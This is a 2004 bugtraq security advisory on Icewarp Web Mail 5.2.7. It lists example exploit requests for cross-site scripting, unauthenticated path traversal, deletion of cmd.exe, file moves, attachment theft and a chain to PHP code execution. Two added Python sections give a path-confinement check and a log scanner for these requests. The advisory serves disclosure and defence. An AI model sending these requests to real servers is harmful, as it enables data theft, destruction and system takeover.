
List:       bugtraq
Subject:    Multiple vulnerabilities in Icewarp Web Mail 5.2.7
From:       ShineShadow <ss_contacts () hotmail ! com>
Date:       2004-09-10 16:30:33
Message-ID: 20040910163033.27745.qmail () www ! securityfocus ! com

ShineShadow Security Report 10092004-01

TITLE: Multiple vulnerabilities in Icewarp Web Mail 5.2.7

BACKGROUND

Merak Mail Server, with the revolutionary Merak Mail Server GroupWare Server, cutting-edge Merak Mail Server Instant Antispam and much more, is the fastest, most stable, secure and 100% virus free mail server on the market today. Every day companies choose Merak Mail Server's stability, speed, security, functionality, scalability and multi-tiered delegated manageability over products costing thousands of dollars more yet lacking the sophistication that Merak delivers. In less than 10 minutes you can have the same professional email server that organizations such as NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and Developers depend on every day.

Source: www.MerakMailServer.com (official web-site)

VULNERABLE PRODUCTS

MERAK Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 (earlier versions may also be vulnerable). MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 is vulnerable to vulnerability #5.

DETAILS

1. Multiple cross-site scripting (XSS) vulnerabilities.

Active session required: YES

Description: A remote user who HAS an active session on Merak Mail Server can carry out a cross-site scripting (XSS) attack. It could be used to execute malicious script in the web browsers of other users.

Vulnerable pages: 
accountsettings.html
search.html

Examples:
http://[targethost]:32000/mail/accountsettings.html -> Add -> "Account name", "Incoming mail server", "User name" = <script> alert(document.cookie) </script>
http://[targethost]:32000/mail/search.html -> "Search string" = <script> alert(document.cookie) </script>

2. Arbitrary directory creation on target system.

Active session required: NO

Description: A remote user who does NOT have an active session on Merak Mail Server can create arbitrary directories on the local file system of the target. It could be used during an attack on an affected system.

Vulnerable pages: viewaction.html

Example:
http://[targethost]:32000/mail/viewaction.html?Move_x=1&user=../../hacker

3. Full install path disclosure.

Active session required: NO

Description: A remote user who does NOT have an active session on Merak Mail Server can disclose the full install path of Merak Mail Server. It could be used during an attack on an affected system.

Vulnerable pages: 
accountsettings_add.html
topmenu.html

Examples: 
http://[target host]:32000/mail/accountsettings_add.html
http://[target host]:32000/mail/topmenu.html

4. Viewing or downloading arbitrary attachments.

Active session required: NO

Description: A remote user who does NOT have an active session on Merak Mail Server can access the attachments of any user. It could be used to access personal information of other users.

Vulnerable pages: attachment.html

Example: 
http://[targethost]:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox


5. Creating a text file with arbitrary content.

Active session required: YES

Description: A remote user who HAS an active session on Merak Mail Server can create a text file on Merak Mail Server with arbitrary content (including special characters). The file will be named accounts.dat. Combining this vulnerability with vulnerability #8, an attacker could execute arbitrary PHP code and take complete control of an affected system.

Vulnerable pages: accountsettings_add.html

Example:
http://[targethost]:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any text with special characters]

Note: MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 is also vulnerable to this.

6. Arbitrary file deletion on target system.

Active session required: NO

Description: A remote user who does NOT have an active session on Merak Mail Server can delete arbitrary files on the local file system of the target. It could be used to delete any data on an affected system or to cause denial of service (DoS) conditions.

Vulnerable pages: viewaction.html

Example:
http://[targethost]:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32


7. Moving arbitrary files or directories on target system.

Active session required: NO

Description: A remote user who does NOT have an active session on Merak Mail Server can move arbitrary files or directories on the local file system of the target. It could be used to cause denial of service (DoS) conditions or to gain access to arbitrary files on an affected system.

Vulnerable pages: viewaction.html

Example:
http://[targethost]:32000/mail/viewaction.html?messageid=....//....//config/settings.cfg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail

8. Renaming arbitrary files or directories on target system.

Active session required: YES

Description: A remote user who HAS an active session on Merak Mail Server can rename arbitrary files or directories on the local file system of the target. Moving files or directories is also possible. It could be used to cause denial of service (DoS) conditions or to gain access to arbitrary files on an affected system.

Vulnerable pages: folders.html

Example:
http://[targethost]:32000/mail/folders.html?id=[sessionid]&folderold=....//....//....//....//....//winnt&folder=....//....//....//....//....//linux&Save_x=1
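Vulnerabilities 2, 6, 7 and 8 all come down to request parameters (user, originalfolder, messageid, folderold, folder) reaching the file system with `..` sequences or absolute paths intact, and the `....//` form used in #7 and #8 is the usual shape for getting past a filter that deletes `../` in a single pass. The check below is an added example written for this page, not code from IceWarp or Merak: it puts that single-pass stripping beside confinement by canonicalisation against a base directory, with MAIL_ROOT a constructed temporary directory standing in for the mailbox root. It runs on a POSIX host; the drive-letter and backslash handling exists because the affected product runs on Windows.

```python
import os
import re
import tempfile

# Constructed stand-in for the web mail's mailbox root; a real deployment
# would use its configured mail directory here.
MAIL_ROOT = tempfile.mkdtemp(prefix="mailroot-")


def naive_strip(value: str) -> str:
    """A sanitiser that deletes '../' in one pass. str.replace does not
    rescan its output, so '....//' collapses to '../' and survives."""
    return value.replace("../", "")


def is_confined(param: str, base: str = MAIL_ROOT) -> bool:
    """True only if `param`, treated as a path relative to `base`, still lies
    inside `base` after full canonicalisation. Absolute paths, drive letters
    and UNC prefixes are refused outright rather than joined and resolved."""
    if not param or "\x00" in param:
        return False
    normalized = param.replace("\\", "/")  # Windows accepts either separator
    if normalized.startswith("/") or re.match(r"^[A-Za-z]:", normalized):
        return False
    base_real = os.path.realpath(base)
    # realpath collapses '..' and follows symlinks, so a value that only
    # *looks* suspicious (a directory literally named '....') stays inside,
    # while anything that actually climbs out of the root is caught.
    candidate = os.path.realpath(os.path.join(base_real, normalized))
    return os.path.commonpath([base_real, candidate]) == base_real


def resolve_mailbox_path(param: str, base: str = MAIL_ROOT) -> str:
    """Return the canonical on-disk path for a confined parameter, or raise."""
    if not is_confined(param, base):
        raise ValueError(f"path parameter escapes mailbox root: {param!r}")
    return os.path.realpath(os.path.join(base, param.replace("\\", "/")))


if __name__ == "__main__":
    samples = ["inbox/20040801", "../../hacker",
               "....//....//config/settings.cfg", "c:/winnt/system32"]
    for p in samples:
        print(f"{p!r:40} naive_strip -> {naive_strip(p)!r:32} confined: {is_confined(p)}")
    # The strip-then-use chain is what turns '....//' into an escape:
    print("after naive strip:",
          is_confined(naive_strip("....//....//config/settings.cfg")))
```

The point the last line makes is the one that matters for a fix: `....//....//config/settings.cfg` taken as-is resolves to a harmless subdirectory and passes the confinement check, but the same value after a single-pass strip is `../../config/settings.cfg` and fails it. Validate the canonical path; do not try to sanitise the string.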


EXPLOITATION

IceWarp Web Mail (the CONTROL service) must be running on Merak Mail Server (it is ENABLED by default). Only a web browser is needed to exploit these vulnerabilities.
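Because every request above is a plain GET from a browser, the web mail's access log already contains what a defender needs to spot them. The scanner below is an added example, not something shipped with Merak or IceWarp: it parses constructed Common Log Format lines (addresses, timestamps and the session id abc123 are made up; the paths follow this report), URL-decodes each query parameter, and flags traversal sequences, absolute Windows or POSIX paths, and requests to the file-handling pages named here that carry no `id` session parameter. The assumption that a legitimate browser session always sends `id=` is mine, not the report's.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Common Log Format lines; addresses, timestamps and the session
# id "abc123" are made up, the request paths follow the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Sep/2004:16:30:01 +0000] "GET /mail/login.html HTTP/1.1" 200 1532
10.0.0.5 - - [10/Sep/2004:16:30:07 +0000] "GET /mail/search.html?id=abc123&search=invoice HTTP/1.1" 200 844
10.0.0.9 - - [10/Sep/2004:16:31:12 +0000] "GET /mail/viewaction.html?Move_x=1&user=../../hacker HTTP/1.1" 200 211
10.0.0.9 - - [10/Sep/2004:16:31:40 +0000] "GET /mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32 HTTP/1.1" 200 211
10.0.0.9 - - [10/Sep/2004:16:32:03 +0000] "GET /mail/attachment.html?user=example.com/admin&messageid=20040801&index=3&folder=inbox HTTP/1.1" 200 90211
10.0.0.9 - - [10/Sep/2004:16:32:30 +0000] "GET /mail/folders.html?id=abc123&folderold=....%2F%2F....%2F%2Fwinnt&folder=linux&Save_x=1 HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Pages from the report that turn request parameters into file-system paths.
FILE_PAGES = {"/mail/viewaction.html", "/mail/attachment.html", "/mail/folders.html"}

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")                 # also matches inside "....//"
ABS_PATH_RE = re.compile(r"^(?:[A-Za-z]:[/\\]|[/\\])")  # c:\..., /..., \\server\...


def inspect_request(target: str) -> list:
    """Return the reasons one request target looks like an attempt to reach
    the file system through a path parameter (empty list if nothing is seen)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # second decode catches %25-style double encoding
            if TRAVERSAL_RE.search(value):
                reasons.append(f"traversal sequence in {name}")
            elif ABS_PATH_RE.match(value):
                reasons.append(f"absolute path in {name}")
    # Assumption: browser-driven sessions always carry id=, so a file-handling
    # page without it matches the unauthenticated pattern in the report.
    if parts.path in FILE_PAGES and "id" not in params:
        reasons.append("file-handling page requested without session id")
    return reasons


def scan_log(text: str) -> list:
    """Return (line_no, client_ip, path, reasons) for every flagged line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; a real deployment would count these separately
        reasons = inspect_request(m.group("target"))
        if reasons:
            hits.append((line_no, m.group("ip"),
                         urlsplit(m.group("target")).path, reasons))
    return hits


if __name__ == "__main__":
    for line_no, ip, path, reasons in scan_log(SAMPLE_LOG):
        print(f"line {line_no} {ip} {path}: {'; '.join(reasons)}")
```

The scanner is deliberately parameter-agnostic: it does not need to know which parameter each page maps to a path, only that no legitimate value on these pages should contain `..` or start at a drive or filesystem root. The session-id rule is the noisier of the two and is the one to tune against your own traffic first.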

WORKAROUND

Upgrade to MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 or higher. Disabling the Icewarp Web Mail service (Control.exe) is also possible.

VENDOR STATUS

The vendor was contacted on August 6th about this and some other vulnerabilities (not described in this report). There was no response, but a new version of the product (MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8) was released on August 12th. NOT ALL REPORTED VULNERABILITIES HAVE BEEN FIXED IN ICEWARP WEB MAIL 5.2.8.

SUMMARY

An attacker who successfully exploited the vulnerabilities described in this report could take complete control of a Merak Mail Server 7.4.5 or an affected remote system. Icewarp Web Mail 5.2.8 is also vulnerable to other critical vulnerabilities (not described in this report). An attacker who successfully exploited these undescribed vulnerabilities could take complete control of a Merak Mail Server 7.5.2 or an affected remote system. I do not advise using this product; you must disable the Icewarp Web Mail service.

CREDITS

ShineShadow, independent computer security expert.
To get more information, please contact me by e-mail.

10.09.2004
ShineShadow,
ss_contacts@hotmail.com

